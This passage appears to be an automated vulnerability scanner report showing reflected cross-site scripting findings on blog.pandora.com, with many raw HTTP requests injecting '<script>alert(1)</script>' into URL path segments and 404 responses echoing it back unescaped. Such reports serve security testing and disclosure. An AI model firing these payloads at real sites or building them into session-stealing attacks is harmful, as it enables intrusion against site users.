GET /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)</script>a7a6b182afd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)</script>47ec2e2aa5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)</script>1fdd8212aca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)</script>92fb96256a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)</script>68fbf40c4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)</script>00e0120b037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)</script>b9522db024f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)</script>e4d44414054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)</script>2400c298808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)</script>475006746a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)</script>65e022c3582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)</script>7b57931b113 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)</script>6c1d1e3fb41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)</script>4ec169aa6ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)</script>ceeadd94af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)</script>60d006b3a3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)</script>c3ee8c2d938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)</script>a757f005820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)</script>2b229393208 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
